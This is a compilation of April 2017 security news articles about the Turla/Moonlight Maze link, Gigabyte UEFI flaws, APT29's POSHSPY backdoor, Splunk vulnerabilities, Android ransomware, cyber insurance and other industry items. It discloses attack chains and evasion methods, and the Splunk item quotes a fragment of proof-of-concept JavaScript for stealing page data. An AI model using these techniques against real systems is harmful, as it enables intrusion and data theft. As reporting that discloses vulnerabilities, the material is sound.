The researchers speculated that the missing link between the two cyber espionage operations lies in the Penquin Turla attacks dated back 2011 and spotted by Kaspersky Lab in 2014. Penguin Turla was designed to compromise Linux machines with a backdoor based on the open-source LOKI2 backdoor that was released in Phrack magazine in September 1997.

“The revelation that the Moonlight Maze attacks were dependent on a Solaris/*NIX toolkit and not a Windows one as is the case with most of Turla, actually revived our hopes.” reads the analysis published by Kaspersky. “In 2014, Kaspersky announced the discovery of Penquin Turla, a Linux backdoor leveraged by Turla in specific attacks. We turned our attention once again to the rare Penquin samples and noticed something interesting: the code was compiled for the Linux Kernel versions 2.2.0 and 2.2.5, released in 1999. Moreover, the statically linked binaries libpcap and OpenSSL corresponded to versions released in the early 2000s. Finally, despite the original assessment incorrectly surmising that Penquin Turla was based on cd00r (an open-source backdoor by fx), it was actually based on LOKI2, another open-source backdoor for covert exfiltration written by Alhambra and daemon9 and released in Phrack in the late 1990s.”

Guerrero-Saade explained that of the 45 Moonlight Maze binaries that were detected by experts at Kaspersky, nine of them were examples of the LOKI2 backdoor.

This discovery is amazing because it demonstrates a 20-year-old hacking tool is still effective against high-value targets.

“This speaks to the state of Linux security and the lack of awareness—and even hubris—that goes into some Linux system administration, an ill-advised approach for government and corporate settings,” Guerrero-Saade said. “These guys (Moonlight Maze) didn’t have to play the cat-and-mouse game with antivirus companies or rewrite their toolkit 30 times to get it through VirusTotal and still hope it works. It’s terrifying to see that the evolved Penquin Turla samples are based on 20 year old code and still linked to libraries built in 1999-2004 and they still work on modern machines. You’d never see that on Windows.”

Summarizing the possible link between the Moonlight Maze’s early UNIX and Solaris toolkits and modern Turla Windows attacks is the LOKI2 backdoor used in the Penguin Turla attacks.

The researchers conducted an intriguing a lucky investigation, they have found the original artifacts thanks a system administrator in the U.K. named David Hedges who in cooperation with the London Metropolitan Police and the FBI logged every keystroke happening on a server targeted by the Moonlight Maze. The researchers were able to find Hedges because of a redaction error in an FBI FOIA release.

Hedges confirmed that the server was still running and he provided access to logs that include evidence of the Moonlight Maze operation, along with the a toolkit with 43 binaries used in their attacks.

The investigation revealed further details, the researchers focused on a little-known operation codenamed ‘Storm Cloud’. The toolkit used in the attacks was an evolution of the toolkit leveraged by the same Moonlight Maze threat actors.

The first attacks became public in 1999, Storm Cloud was also made public four years later, and also in this case, the code was based on the LOKI2 backdoor.

“We’re really trying to push the crowdsourcing element to this,” Guerrero-Saade said. “Thomas’ first talk helped us find David and more about Moonlight Maze. We need help. We need another David Hedges, someone with access to the Storm Cloud artifacts to really solidify this link.”


UEFI Vulnerabilities allow to fully compromise Gigabyte Mini PCs
4.4.2017 securityaffairs Vulnerebility

Experts at Cylance disclosed two UEFI flaws that can be exploited by attackers to install a backdoor on some Gigabyte BRIX mini PCs.
Experts at security firm Cylance have disclosed two UEFI vulnerabilities that can be exploited by attackers to install a backdoor on some Gigabyte BRIX mini PCs.

The experts tested the latest firmware for GB-BSi7H-6500 and GB-BXi7-5775 mini PCs and discovered that lack of some protection feature that could allow an attacker to exploit the flaws to deliver a ransomware payload that prevents the system from booting.

“These new mitigations, based on virtualization technologies in Windows 10, are vulnerable to UEFI-based attacks from System Management Mode (SMM). Because SMM allows direct access to physical memory, it’s possible to bypass the virtualization layer of isolation (Intel VT-x) . This kind of attack is already discussed in detail in ‘Attacking Hypervisors via Firmware and Hardware’. ” reads the analysis published by Cylance.

One of the issues, tracked as CVE-2017-3197, is related to the SMI handler and it could be exploited to execute code in System Management Mode (SMM). The researchers discovered that the American Megatrends (AMI) firmware running on the affected devices has disabled write-protection mechanisms. The security features are normally enabled by Gigabyte seems to have disabled it.

The flaw is very dangerous, an attacker can trigger it by tricking victims into visiting a specifically crafted website or by opening a weaponized document. Once triggered the flaw, the attacker can elevate privileges to achieve kernel-mode code execution. The attacker can exploit the SMI vulnerability to execute code in SMM and make direct changes to the flash memory.

Below the attack described by the experts:

1. User-mode execution (ring 3)
2. Kernel mode execution (ring 0)
3. SMM execution (ring -2)
4. SPI Flash Write

“The attacker gains user-mode execution through an application vulnerability such as a browser exploit or a malicious Word document with an embedded script. From there, the attacker elevates his privileges by exploiting the kernel or a kernel module such as Capcom.sys to execute code in ring 0. A vulnerable SMI handler allows the attacker to execute code in SMM mode (ring -2) where he finally can bypass any write protection mechanisms and install a backdoor into the system’s firmware.”

gigabyte

The second vulnerability tracked as CVE-2017-3198, is caused by the fact that the Gigabyte UEFI does not perform a cryptographic check to ensure the authenticity and integrity of a firmware update. This means that an attacker that exploited the issue is able to provide malicious firmware onto the device.

“The GIGABYTE UEFI firmware does not cryptographically validate images prior to updating the system firmware. Additionally, the firmware updates are served over HTTP without checksums for verifying authenticity.” reads a blog post published by Cylance.

An attacker can use the provided AMI Firmware Update (AFU) utility to write arbitrary code to the firmware.”

“As mentioned in our previous post, successful infection at such a low level has the potential to be disastrous. UEFI rootkits and ransomware, as we demonstrated at both RSA Conference and BlackHat Asia, could provide attackers with a degree of control that is difficult, if not near-impossible, to detect or rectify.” continues a blog post published by Cylance.

The security flaws were discovered just before Christmas and the experts reported it to Gigabyte in mid-January. The company has already developed a firmware update, version vF7, that is currently in testing phase and will be soon released. However, the update will only be available for GB-BSi-7H-6500 as the GB-BXi7-5775 model has reached

Unfortunately, the update will only be available for GB-BSi-7H-6500 because the GB-BXi7-5775 model has reached end of life.


New "USB Canary" Keeps Close Watch on USB Ports

3.4.2017 securityweek IT
New "USB Canary" Tool for Linux Monitors USB Ports 24/7

A new open source tool can provide Linux users with the ability to receive an alert any time someone attempts to plug a device into one of their machine’s USB ports.

Dubbed USB Canary, the tool uses pyudev to monitor USB devices and can be set to do so either at all times or only when the computer is locked. More importantly, the tool can be configured to alert users when someone is tampering with their USB ports. It can either send an SMS via the Twilio API, or send a Slack notification via an inbuilt Slack bot.

Released in open source not long ago, the tool aims at overcoming some of the shortcomings of other monitoring tools that inform the user on USB port-related incidents only after login. USB Canary aims at keeping an eye on systems at all times when they are unattended.

According to the researcher, who goes by the online handle errbufferoverfl, although the tool is available only for Linux at the moment, Windows and macOS versions are also planned (but no specific details on them have been revealed so far).

Written in Python, the author explains that the tool was initially created as a personal utility while he was between jobs and that the use of third-party libraries.

Users can configure the tool to detect the type of screensaver running on the computer (it can detect XScreenSaver and gnome-screensaver, but can be used with unsupported screensavers as well), to turn a “paranoid” mode on, and set the notifications to arrive either via Twilio or Slack.

“Paranoid mode is also suitable for people who want to monitor if their servers have had USB's plugged into them, although I haven't tested them on Linode, Amazon Web Services, or Digital Ocean it is suitable for those with physical servers that may need this sort of monitoring,” the researcher notes.

Although this was a personal project in the beginning, others already picked it up and helped improving it through their contributions.

The open source tool is available via GitHub.


APT29 Uses Stealthy Backdoor to Maintain Access to Targets

3.4.2017 securityweek APT
Researchers at FireEye-owned Mandiant have conducted a detailed analysis of a stealthy backdoor used by the Russia-linked cyberespionage group APT29 to maintain access to targeted systems.

Dubbed “POSHSPY,” the malware is believed to be a secondary backdoor used by the cyberspies in case they lose access to their primary backdoors. Mandiant first spotted POSHSPY in 2015 during an incident response engagement, and identified it on the networks of several organizations over the past two years.

Similar to other pieces of malware used by APT29, POSHSPY leverages PowerShell and the Windows Management Instrumentation (WMI) administrative framework.

WMI can be used to obtain system information, start and stop processes, and configure conditional triggers. In the case of POSHSPY, WMI is used to run a PowerShell command that decrypts and executes the backdoor code directly from a WMI property, thus ensuring that no artifacts are left on the hard drive.

The WMI component of POSHSPY executes the PowerShell component on every Monday, Tuesday, Thursday, Friday and Saturday at 11:33 AM local time.

Experts pointed out that the use of legitimate Windows tools and the other techniques employed in these attacks increase the backdoor’s chances of evading detection.

“POSHSPY's use of WMI to both store and persist the backdoor code makes it nearly invisible to anyone not familiar with the intricacies of WMI. Its use of a PowerShell payload means that only legitimate system processes are utilized and that the malicious code execution can only be identified through enhanced logging or in memory,” explained Matthew Dunwoody, incident response consultant at Mandiant.

“The backdoor's infrequent beaconing, traffic obfuscation, extensive encryption and use of geographically local, legitimate websites for command and control (C2) make identification of its network traffic difficult. Every aspect of POSHSPY is efficient and covert,” Dunwoody added.

The malware allows attackers to download and execute additional PowerShell code and executable files. The threat communicates with command and control (C&C) servers located at URLs generated using a domain generation algorithm (DGA) that relies on lists of domain names, TLDs, subdomains, URIs, file names and file extensions. C&C communications are encrypted using AES and RSA public key cryptography.

FireEye has not shared any information on which countries or what types of organizations have been targeted in attacks involving the POSHSPY backdoor.

The APT29 group has put some effort into making its operations more difficult to detect. Earlier this month, FireEye detailed the threat actor’s use of a technique called “domain fronting” to disguise the malicious traffic generated by its tools.

APT29 is also known as The Dukes, Cozy Bear and Cozy Duke. The group is believed to be behind the recent election-related attacks in the U.S. and a campaign targeting high-profile organizations in Norway.


UEFI Vulnerabilities Found in Gigabyte Mini PCs

3.4.2017 securityweek Vulnerebility

Endpoint security firm Cylance has disclosed the details of two potentially serious UEFI vulnerabilities that can be exploited to install a backdoor on some Gigabyte BRIX mini PCs. The vendor is working on a firmware update that will address the flaws.

Cylance said it had tested the latest firmware for GB-BSi7H-6500 and GB-BXi7-5775 mini PCs and discovered that some important protection mechanisms are missing. The company has described an attack scenario where a malicious actor exploits the vulnerabilities to deliver a ransomware payload that prevents the system from booting.

One of the vulnerabilities found by researchers, tracked as CVE-2017-3197, is related to the SMI handler and it allows an attacker to execute code in System Management Mode (SMM). The American Megatrends (AMI) firmware present on affected devices does normally provide write-protection mechanisms designed to prevent unauthorized changes, but these protections have not been enabled by Gigabyte.

Hackers can exploit this flaw for malicious attacks by first gaining access to the targeted system via a browser or document exploit. The attacker can then elevate privileges to achieve kernel mode code execution. Since write-protection mechanisms are not enabled, the attacker can exploit the SMI vulnerability to execute code in SMM and make changes to the flash memory.

The second vulnerability, identified as CVE-2017-3198, is related to the fact that the Gigabyte UEFI does not perform a cryptographic check to ensure that a firmware update is legitimate. Furthermore, firmware updates are served over HTTP.

An attacker who obtains access to the targeted system can install the legitimate UEFI update utility and use it to push a malicious firmware onto the device.

“Successful infection at such a low level has the potential to be disastrous,” Cylance researchers said in a blog post. “UEFI rootkits and ransomware could provide attackers with a degree of control that is difficult, if not near-impossible, to detect or rectify.”

The vulnerabilities were discovered on December 20 and they were reported to Gigabyte in mid-January. The vendor says it has prepared a firmware update, version vF7, that is in the final phase of testing. However, the update will only be available for GB-BSi-7H-6500 as the GB-BXi7-5775 model has reached end of life.


Splunk Patches Information Theft and XSS Flaws

3.4.2017 securityweek Vulnerebility
Splunk last week released an update for Splunk Enterprise to address an information theft bug and a persistent Cross Site Scripting (XSS) vulnerability.

Discovered last year by security researcher John Page (who goes by the online handle of hyp3rlinx), the information theft issue is tracked as CVE-2017-5607 and has been assessed a CVSS Base Score of 3.5. The vulnerability can be exploited by a remote attacker to siphon information from Splunk Enterprise when the user visits a malicious webpage.

In an advisory, the security researcher notes that an attacker exploiting this vulnerability could access data such as the currently logged in username and if remote user setting is enabled. With the username in hand, the attacker could either phish or brute force the Splunk Enterprise login.

The attacker can use JavaScript to exploit the issue, as the root cause of it is the global Window JS variable assignment of config?autoload=1 '$C', the security researcher notes in his advisory.

“To steal information we simply can define a function to be called when the '$C' JS property is ‘set’ on webpage, for example.

Object.defineProperty( Object.prototype, "$C", { set:function(val){...

The Object prototype is an Object that every other object inherits from in JavaScript, if we create a setter on the name of our target in this case "$C", we can get/steal the value of this data, in this case it is very easy as it is assigned to global Window namespace,” the researcher explains.

Splunk has confirmed that affected Splunk Enterprise versions include 6.5.x before 6.5.3; 6.4.x before 6.4.6; 6.3.x before 6.3.10; 6.2.x before 6.2.13.1; 6.1.x before 6.1.13; 6.0.x before 6.0.14; 5.0.x before 5.0.18; and Splunk Light before 6.5.2.

The security researcher discovered the bug in November 2016 and reported it to Splunk the same month. He received acknowledgement of the bug a couple of days later, but the patch was released only last week. The researcher published not only details pertaining to the vulnerability, but also proof-of-concept JavaScript code and a video to demonstrate the flaw.

The second vulnerability addressed in Splunk Enterprise last week was a persistent Cross Site Scripting in Splunk Web, which was found to allow an attacker to inject and store arbitrary script, but only if they are authenticated in Splunk web before exploiting the bug. Assessed with a CVSS Base Score of 6.6, the flaw impacts Splunk Enterprise versions 6.5.x before 6.5.3; 6.4.x before 6.4.6; 6.3.x before 6.3.10; 6.2.x before 6.2.13; and Splunk Light before 6.5.2.


Cyber Risk and Cyber Insurance – Insurance challenge to the CIO as corporate Cyber Security Effectiveness manager
3.4.2017 securityaffairs CyberCrime

[By Cesare Burei, Margas on courtesy of @CLUSIT – Rapporto Clusit 2017 – All right reserved]
Until the corporate Risk Managers dealing with Cyber Risk, and there are not many of these, start working at all levels, who shall be entrusted with the management of Cyber Risks and, more specifically, with the transfer of risk to the Insurance Companies? The answer is a joint round table driven by the CIO.

The Clusit Report 2016 provided the basics of the terminology, key features and usefulness of cyber policies in a Focus On dedicated to insurance in support of the so-called Cyber Risk management. The authors implicitly addressed the CFO, the position that usually supervises the insurance issues in a company.

One year after, the daily dealings between businesses, insurance brokers and ICT consultants have highlighted the following elements:

Cyber Risk includes the accident/attack and all its direct and indirect consequences
Awareness of the pervasive nature of Cyber Risk well beyond the walls of EDP, in a digital ecosystem made of interconnections and process, people and now objects (IoT) interdependence has increased
Risk Management, meaning risk analysis and mitigation and insurance transfer, has become increasingly important.
Business interruption, loss of reputation and data loss/unavailability are the most frequent issues for businesses.
This gave rise to a double investigation in the North-East of Italy, which ended in the “Enterprise Cyber Risk Exposure & Insurance” 1 report by Via Virtuosa, in collaboration with Margas for the insurance part, published on line at the end of 2016, hereinafter, the “White Paper”.

The first survey outlines, through the answers given by CIOs and Systems Administrators, the risk exposure of companies, so that CFOs and CEOs can become aware of the central role of the Cyber Security activity, managed in-house or outsourced. The second survey, also carried out with the help of the CIO, who has to assess the risk or the protection levels in place, tries to assess the level of knowledge and sensitivity of the insurance transfer.

The results highlight some aspects that show the key role of the CIO in the transition phase from the management of ICT security to cyber risk management for the whole company; the transfer of the so-called “residual risk” to the insurance company is an ultimate, fundamental component of such management. For this reason, the white paper includes some basic information on the Italian insurance market and, above all, thanks to the 18 questions that three CIOs accepted to ask, it also includes 18 useful answers that allow people to find their direction in the purchase of an insurance policy with increased awareness.

1 *The “Cyber Risk Exposure & Cyber Risk Insurance” white paper is the result of the joint efforts of Luca Moroni and Cesare Burei. It also includes the contributions by CIOs E. Guarnaccia – BPV | M. Cozzi – Hypo Bank |A. Cobelli – ATV| and the answers to their 18 questions on cyber-insurance. The risk exposure survey was carried out in the 2013-2016 three-year period, while the one on Cyber Risk Insurance in summer 2016. The white paper can be downloaded free of charge from: www.viavirtuosa.com/whitepaper and supports the “Generation Z” survey on online security and the prevention of risk for minors https://www.facebook.com/ProgettoGenerazioneZ/

Cyber Risk Insurance. Why?
The certainty that it is not possible to defend oneself completely from Cyber Risks requires such risks to be managed and the relevant tools to be correctly assessed in terms of costs and benefits. In short, it is a matter of balance between the impact of a cyber or cyber-related adverse event, the money spent in the management /insurance process and the maintenance of business margins.

Source: L. Moroni – “Cyber Exposure & Cyber Risk Insurance” White paper presentation at Infosek 2016 – Slovenia

On the occasion of the Security Summit and thanks to the Clusit Report, a lot of figures and percentages were made known, the better to describe the overall cyber un-safety, as they all underscore that there is no 100% safe system.

Source: CHUBB Claim Trends 8/2016

It is possible to be proactive, with effective and appropriate investments on the reduction of corporate risks, in order to be prepared to deal with accidents and the costs/damages that they engender. Insurance policies turn an uncertain, often unsustainable cost/damage into a programmed and sustainable cost/premium. The choice, therefore, must be based on a careful assessment, in the prevention phase, so that the policies shall truly act as a financial and economic parachute, allowing the company to avoid the closure and be still competitive after the incident, providing the appropriate tools for compensate balance sheet losses and recover the brand reputation.

Source: CHUBB Claim Trends 8/2016

Cyber Risk Exposure and Cyber Risk Insurance
Speaking about Cyber Risk Insurance, a policy or set of policies that “cover” the damages and costs generated by a cyber or cyber-related adverse event, it makes no sense if there is no awareness of one’s risk exposure and thus there is no attempt to adopt measures to mitigate such exposure.

The risk exposure survey results

The risk exposure survey carried out by Via Virtuosa in the course of 3 years, synthesised in the White paper, “rather than highlighting an individual company’s positioning and risk exposure, focuses on the statistical trends of the interviewed sample, in this case, companies in the North-Eastern part of Italy, as against a reference Base Line (Red Line). The measuring method used in this case is strictly objective (as was the case for the 2700x) and the same for the whole sample group, even though it was considerably simplified. The method in question is the one adopted by the European Union Agency for Network and Information Security (ENISA).

Those who fall in the yellow section at the top right (yellow) have a significant risk exposure, with a potentially disruptive impact on their business. Those who find themselves in this section are invited (as per the Method) to “outsource their risk.”

This research highlighted the following aspects:

There is a high level of corporate Cyber risk that has a direct impact on business continuity.
The IT department is usually aware of the issue, but is faced with an almost total lack of managerial attention from the corporate board, which translates into a dearth of investment.
There is no objective measure of the Cyber risk on the part of enterprises.
Objective indications of the need to transfer the Cyber risk outside the company emerge.
The results of the CIOs and Cyber Risk Insurance survey
The sample of this second survey contained a prevalence of subjects from the industry and services sectors (40% and 35%, respectively), with turnovers exceeding 20 million Euro (75%) and with over 100 employees (50% between 100-500 and 30% > 500).

This presupposes that aspects such as Reputation, Business Interruption and Sensitive Data management might be critical.

In the survey, IT Managers were asked, first of all, about the best case scenario in terms of board commitment to the creation of a corporate security team, and whether ICT security is considered an integral part of the general security approach or just as a possible source of costs and damages (questions 1,4).

Source: “Cyber Risk Exposure & Cyber Risk Insurance” White paper, Via Virtuosa 12/2016

Source: “Cyber Risk Exposure & Cyber Risk Insurance” White paper, Via Virtuosa 12/2016

Then, the same subjects were asked to do something that was probably unusual for them: interact with their respective CFOs, in order to answer the question on the presence of some insurance policies that ought to be taken into consideration with regard to the criticalities highlighted by the risk exposure analysis. (question 3)

Source: “Cyber Risk Exposure & Cyber Risk Insurance” White paper, Via Virtuosa 12/2016

60% of the interviewed CIOs were involved in a wider approach to security. Again, in 60% of cases the CIO had not, to that point, taken an interest in insurance policies (q.2), and even though in 80% of cases no one in the company thought to ask him about the impact of a possible accident (q. 4), he had a clear idea of its origins (q. 4) and was able to identify the sector that might suffer the most from a business interruption (question 8).

Source: “Cyber Risk Exposure & Cyber Risk Insurance” White paper, Via Virtuosa 12/2016

The CIO deals with ICT security: he monitors vulnerabilities (60% of cases) and the Business Continuity and Disaster Recovery plans (50-60% of cases), but deals very rarely with reputation crisis issues (18%), procedure/policy formalisation (28%) or the standardisation of issues (12%).

It is a positive sign that the CIO receives requests for information concerning ICT security management (question 7) first of all from inside the company (+70%), then from external auditors (+28%) and from customers and ICT suppliers in equal measure (23-24%). The latter percentages might increase in future, leading to a supply chain control in terms of virtuous management and also of insurance, and in any case they may constitute a good foundation for a Cyber Risk Management policy.

Source: “Cyber Risk Exposure & Cyber Risk Insurance” White paper, Via Virtuosa 12/2016

39% of them state that they know of security accidents occurred in the last 5 years. An analysis of the causes shows that such accidents are substantially attributable, in equal proportions, to (external/internal) attacks, with a prevalence of Ransomware (as more than 50% declared), to (internal/external) human error and to failures (question 9).

Source: “Cyber Risk Exposure & Cyber Risk Insurance” White paper, Via Virtuosa 12/2016

What question 8 revealed concerning the CIO’s opinion of the worst impact of a stop of the ICT activities on the Administration/Accounting (+ 80%), logistics and deliveries (73%) and sales (60%) departments, makes it possible for the authors to go back to the value and meaning of insurance outsourcing: failure to pay the suppliers, failure to make orders or failed deliveries can assuredly cause problems for the bottom line in the short-, medium- or long-term.

“Virtuous” companies, that is to say, those that have adopted Cyber Risk Management policies, can therefore deal with the insurance companies with a full awareness of the residual risk that needs to be transferred, especially with regard to business interruption, intentional/accidental cyber issues and issues of general or professional third-party liability, and correctly assess also the reputation risk, if necessary.

With the CIO at the Cyber Risk Management round table
The results of the survey show that the CIO can act as a “cultural mediator” for the company, with the help of a competent insurance broker.

Below is a brief synthesis of the activities of a hypothetical operational round table on the management of cyber risk:

Cyber Risk Exposure and proactive approach: knowing the extent and nature of the exposure

Identify and quantify the assets and their value
Identify the exposure and its value, that is to say, the operating and financial consequences of an adverse event
Identify and quantify the investment in mitigation activities
Check the insurance coverage of the company and of its suppliers
Now the necessary tools and knowledge to deal with the insurance issues are in place, so it is time to TRANSFER THE RESIDUAL RISK.

Cyber Risk Insurance: transfer the residual risk to an Insurance Company

Identify a skilled insurance partner and analyse the corporate insurance stand.
Check the traditional policies purchased by the company to which the cyber coverage might be added.
Choose and structure a Cyber insurance policy that specifically deals with the risk to be transferred and the relevant costs (business interruption, general and professional third-party liability, violation or improper use of assets, defence of reputation, reaction and analysis countermeasures, etc.)
For further details, please refer to the Focus On feature in the 2016 Clusit Report.

The results of the “dialogue” between the CIO and the Insurance Broker – Answers concerning Cyber Risk Insurance
We asked the CIOs of three important companies in the North-East of Italy to ask any questions they could thing of in order to make the layman understand the opportunities and limitations of the insurance policy. Here is a synthesis of the answers to the most frequently asked questions (18):

It is necessary to analyse the existing policies and check whether they cover also the ICT issues identified during the analysis;

To date, there is no requirement for a shared standard measure of exposure. Any best practices, certifications for risk mitigation can promote the successful transfer of risk to the insurance company at better coverage conditions;

GDPR and insurance: it will be essential to know whether the company is in possession of Sensitive Data according to the expanded definition of the new Regulation, in which country and which measures it adopts to defend against data breach. If the company’s own or Third-Party Sensitive Data are entrusted to a third party, it shall be necessary to analyse the existing contracts with the relevant supplier and check the contractual indemnities, in order to transfer the cost of the GDPR mandatory actions correctly. If the company writes or customises code, the extent of the corporate (professional, general, product) liability is to be assessed quite thoroughly;

Simulate the impact of a Cyber adverse event on the bottom line, in terms of cost increases and loss of gross profit. This is maybe the most critical and underestimated field, one that is known to insurers as Business Interruption.

To conclude, it is clear that the Cyber Risk Management approach must be based on a close cooperation between the corporate risk owners and the CIO and CFO and on a virtuous supply chain that includes customers and suppliers, the help of IT professionals expert in Cyber Security management and implementation and brokers expert on cyber matters who can support the Company in the choice of the right balance between costs and insurance guarantees.

Contents on http://www.clusit.it/rapportoclusit

Get the full report contacting rapporti@clusit.it

Copyright 2017 @ CLUSIT

All rights reserved to the authors of the Opera and Clusit

Any reproduction even partial publishing without the written permission of CLUSIT is forbidden.


Social Media Passwords Provide Easy Route into Corporate Networks

3.4.2017 securityweek Social
A combination of 'security fatigue' among users and inadequate password controls among the social media giants is providing a large attack vector for cybercriminals. This is the conclusion of a newly published survey that queried more than 250 security professionals at the RSA Conference in San Francisco in February 2017.

The survey (PDF), conducted by Thycotic, found that password hygiene is severely lacking even among security professionals. It found, for example, that 50% of security professionals have not changed their social network passwords for a year or more, and 20% have never changed them. When this is coupled with social networks not enforcing their own security options, the result is a weak underbelly for criminals to get into corporate networks.

"As we know," said Joseph Carson, Chief Security Scientist at Thycotic, "social networks give away a lot of private information. For people to not consider changing their passwords on a regular basis on their Facebook, Twitter and LinkedIn accounts, they are easily allowing hackers to access information that will grant them access to other facets of their lives, like their work computers and email. Not only is this a huge vulnerability, but this is also a flaw within large social networks that don't remind or make it clear and transparent to the user about the age or strength of the password or best practices."

It is a combination of factors that creates the problem. Users still use weak passwords and reuse them across multiple accounts. Thirty percent of the security professional respondents have used or are still using birthdays, addresses, pet names or children' names for their work passwords -- and all of these are easily crackable.

The problem is made worse by the increasing use of social media logons, where separate internet services allow users to log on with their Facebook, LinkedIn or Twitter password. "Social Logins creates a major security risk because it becomes the master key for all other accounts," Carson told SecurityWeek. "The problem stems further because it is not a proper vault and is used for more than just social logins -- such as for communication, email, browsing and online shopping -- so it is easily targeted and exploited."

One concerning implication from this survey is that user awareness training cannot solve the problem. The poor password practices of the respondents, said Carson, "is an indication that even security professionals continue to use weak passwords for social accounts and that cyber awareness training and cyber hygiene still has a lot of room for improvement. Much of this is a result of cyber fatigue and lack of built-in automation for social accounts."

According to Verizon's 2016 Data Breach Investigations Report, 63% of confirmed data breaches involved weak, default or stolen passwords. "The use of stolen, weak or default credentials in breaches is not new, is not bleeding edge, is not glamorous, but boy howdy it works," the DBIR says.

Forrester Research puts the breach figure even higher, estimating in its 'Forrester Wave: Privileged Identity Management, Q3 2016' report that up to 80% of breaches involve the abuse of privileged accounts. Thycotic's own research indicates that use of passwords as the primary authentication control is still growing, estimating that the 90 billion passwords currently in use will grow to 300 billion by 2020.

Carson does not believe that the solution can simply be awareness training and improved password practices. "There is no such thing as an uncrackable password," Carson told SecurityWeek; "but you can make it very difficult with the computing power plus time to crack the password -- which can deter the attacker from even trying to crack the password. In most cases, it is easier for the attacker to ask the user to tell them the password via phishing scams."

But the big takeaway from Thycotic's survey is that users -- even those users who should know better -- simply are not making it hard for the criminals. Coupled with the disinclination of social media giants to enforce strong access requirements, social media is providing an easy route into employees' accounts; and from there into corporate privileged accounts. Users, suggests Thycotic, cannot be relied upon to protect their passwords, making technology-based privileged account management an absolute necessity.


Android Ransomware Employs Advanced Evasion Techniques

3.4.2017 securityweek Virus

A newly discovered Android ransomware family employs heavy obfuscation and delayed activation of malicious functionality to ensure it can evade anti-virus solutions, Zscaler security researchers warn.

The malware was found hidden inside the repackaged Russian entertainment social network app OK, which the malware author disassembled to insert malicious code, researchers say. The good news, however, is that the legitimate variant of OK, which has over 50 million downloads in Google Play, hasn’t been compromised.

The first evasion technique leveraged by the mobile threat involves kicking off the malicious activity four hours after the initial installation. Most detection mechanisms expect malware to immediately start operation, meaning that this ransomware won’t be immediately detected.

After the four hours have passed, however, users are prompted to activate device administrator rights for the application. Users can’t dismiss the activation screen and clicking the “Cancel” button won’t help either, because the screen is immediately re-displayed until admin rights are enabled, the security researchers reveal.

As soon as this happens, the malicious app locks the device’s screen and displays a ransom note, informing users that their data has been encrypted and sent to the attacker’s servers. Users are urged to pay a 500 Rubles ransom to restore data and unlock the device. The attackers also attempt to scare users into paying by claiming that they would send a message to all of the victim’s contacts to inform them that the device has been “blocked for viewing child pornography.”

According to Zscaler, however, the malware does not exfiltrate any of the victims’ data, and it has no means of unlocking the compromised device. Although the rasnomware does inform the command and control (C&C) server of the new victim, it has no mechanism to confirm that the ransom was paid, meaning that the device remains locked regardless of victim’s willingness to pay or not.

In addition to the delayed start of malicious activities, the ransomware’s malicious code is highly obfuscated. “Almost all strings, method names, variable names, and class names are disguised in such a way that it's extremely difficult to understand the code. Most of these methods are invoked using Java reflection technique, which allows the author to evade static analysis detection,” Zscaler says.

To stay protected from this threat, users are advised to avoid installing applications from third-party app stores. Those who were already infected should reboot the device in Safe Mode, remove the application’s admin rights, then uninstall it and reboot the device in normal mode.

Based on the use of advanced stealth tactics in this ransomware, Zscaler says that the malware author could be able to successfully upload its creation to the Google Play application storefront, although they haven’t so far.


Japan plans to develop a hack-proof satellite system
3.4.2017 securityaffairs BigBrothers

Japan plan to develop a hack proof satellite system to protect transmissions between satellites and ground stations with a dynamic encryption of data.
Japan’s Internal Affairs and Communications Ministry plans to develop a communications system to protect satellites from cyber attacks.

The hack proof satellite system will protect transmissions between satellites and ground stations implementing a dynamic encryption of data.

“With the proposed plan, the government aims to establish a secure communications network that is unique to Japan, for domestic security purposes and to spur investment in the private-sector aerospace industry.” reported the Watertown Daily Times.

The ambitious project of a hack proof satellite system is led by the National Institute of Information and Communications Technology under the jurisdiction of the ministry, it will involve government, industry and academic institutions. The goal is to propose the system for commercial purposes in five to 10 years, the communications ministry aims to have an advantage in the industry by developing a secure communications system that operates in the private sector (i.e. Companies, organizations) will be able to use at a low cost.

The final decision on the hack proof satellite system will be taken this summer, funds for its activities will be included in the budget plan for fiscal 2018.

Cyber attacks represent a serious threat to satellite communications, satellites have a crucial role in our digital society, almost every industry is benefiting from their services for this reason their security is a pillar of the cyber security strategy of governments worldwide.

Attackers are posing a growing challenge to satellite operators, more exposed are commercial satellites that lack the level of security for the military. Security researchers are warning about possible effects of a successful attack against satellite systems and are urging to building them with a security by design approach.

Satellites communicate with terrestrial base stations using radio waves, hackers can intercept with unpredictable consequences.

Hackers who can decode the encrypted data can steal information, manipulate it or take the control of the satellite.

Governments consider realistic the threat of a cyber attack launched by a nation-state actor, a criminal organization and even by a lone hacker. The principal concerns are related to the operation conducted by Chinese hackers, likely state-sponsored attackers, that in the past have already breached the security of US satellites.

hack proof satellite system

In August, the Chinese government launched the world’s first quantum satellite, which will help it establish “hack-proof” communications between space and the ground.

Alleged state-sponsored hackers interfered with the operations of two U.S. government satellites in 2007 and 2008 obtaining access through a ground station in Norway. The satellites were used for climate monitoring.

The hackers “achieved all steps required to command” the Terra AM-1 satellite, but did not control it. An attacker with command privileges could “deny or degrade as well as forges or otherwise manipulate the satellite’s transmission,” or simply damage or otherwise destroy the satellite.

The project of the Japanese Government is to install a code generator on satellites so they can dynamically encrypt data.

“The dynamic codes will be sent to the ground base station using light beams. As the encryption is dynamic, it is more difficult for hackers to decode data even if they are able to intercept transmissions.” continues the Water Town daily Times.

The code generator is a small cube (approximately 10 centimeters on each side) that could be easily installed on a micro satellite being developed by a start-up firm, which is approximately 30-40 centimeters on each side.


Microsoft is Shutting Down CodePlex, Asks Devs To Move To GitHub
3.4.2017 thehackernews IT
Microsoft has announced to shut down CodePlex -- its website for hosting repositories of open-source software projects -- on December 15, 2017.
Launched in 2006, CodePlex was one of the Microsoft's biggest steps towards the world of open source community -- where any programmer, anywhere can share the code for their software or download and tweak the code to their liking.
However, Microsoft says that the service has dramatically fallen in usage and that fewer than 350 projects seeing a source code commit over the last 30 days, pointing to GitHub as the "de-facto place for open source sharing."
GitHub – 'Facebook for Programmers'
In a blog post published Friday, Microsoft Corporate VP Brian Harry wrote that the shutdown of CodePlex is because the open source community has almost entirely moved over to GitHub, which provides similar functionality for sharing code that people can collaborate on.
"Over the years, we have seen a lot of amazing options come and go but at this point, GitHub is the de-facto place for open source sharing, and most open source projects have migrated there," says Harry.
According to the company, Github has become the "Facebook for programmers," so "it's time to say goodbye to CodePlex."
For now, Microsoft has disabled the ability to create new projects on CodePlex, and in October the site will be turned into a read-only archive.
The complete shutdown comes on December 15 this year, at which point the CodePlex website will be archived indefinitely.
